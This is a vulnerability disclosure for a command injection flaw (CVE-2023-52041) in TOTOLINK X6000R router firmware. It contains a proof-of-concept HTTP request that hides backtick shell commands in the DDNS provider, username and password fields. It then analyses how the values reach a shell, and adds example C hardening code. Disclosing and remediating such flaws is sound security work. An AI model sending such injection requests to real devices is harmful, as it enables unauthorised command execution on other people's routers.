CVE-2023-52041

Product:

TOTOLINK X6000R

Version:

V9.4.0cu.852_B20230719

Firmware download address:

https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/247/ids/36.html

Vulnerability Description:

In the sub_410118 function of the shttpd program, values passed in the request are handed to Uci_Set_Str and then reach CsteSystem, which makes arbitrary command execution possible.

POC

The request below executes the commands ls > /1.txt, ls > /2.txt, and ls > /3.txt respectively.

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.75.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Origin: http://192.168.75.2
Connection: close
Referer: http://192.168.75.2/advance/ddns.html
{"enable":"1","provider":"`ls > /1.txt`","domain":"1","username":"`ls > /2.txt`","password":"`ls > /3.txt`","topicurl":"setDdnsCfg"}

Effect

Analysis

In sub_410118, the program receives the provider, username, and password values passed from the frontend and passes them into Uci_Set_Str.

In Uci_Set_Str, the parameters are concatenated using snprintf and then passed into CsteSystem for execution.

CsteSystem:

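The pattern analysed above (request fields formatted into a command string with snprintf and run by a shell) is closed by validating each field and passing it to the target program as a single argument with no shell in between. The C code below is an added example, not code from the firmware or from the original post; the function names, the `uci set` command form and the constructed `ddns`/`main` names are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define NAME_CHARS  "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
#define VALUE_CHARS NAME_CHARS ".@-"

/* Allowlist check: 1..64 bytes, every byte drawn from `allowed`.
 * Backticks, $, ;, |, &, quotes, spaces and newlines all fail it. */
int only_chars(const char *s, const char *allowed)
{
    size_t n = strlen(s);
    return n > 0 && n <= 64 && strspn(s, allowed) == n;
}

/* Build "config.section.option=value" as a single argv element.
 * Returns 0 on success, -1 on a rejected field or truncation. */
int build_assignment(char *out, size_t outlen, const char *cfg,
                     const char *sec, const char *opt, const char *val)
{
    if (!only_chars(cfg, NAME_CHARS) || !only_chars(sec, NAME_CHARS) ||
        !only_chars(opt, NAME_CHARS) || !only_chars(val, VALUE_CHARS))
        return -1;
    int n = snprintf(out, outlen, "%s.%s.%s=%s", cfg, sec, opt, val);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Hypothetical hardened replacement for the Uci_Set_Str -> CsteSystem path:
 * the value reaches the uci binary via execvp(), never via a shell. */
int safe_uci_set(const char *cfg, const char *sec, const char *opt, const char *val)
{
    char assign[300];
    if (build_assignment(assign, sizeof assign, cfg, sec, opt, val) != 0)
        return -1;
    char *argv[] = { "uci", "set", assign, NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);               /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```

Because execvp() passes the assignment as data, the allowlist is defence in depth; a password field that must accept more characters can widen VALUE_CHARS without reintroducing shell parsing.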


https://kee02p.github.io/2024/01/13/CVE-2023-52041/
Author
Kee02p
Published
January 13, 2024
License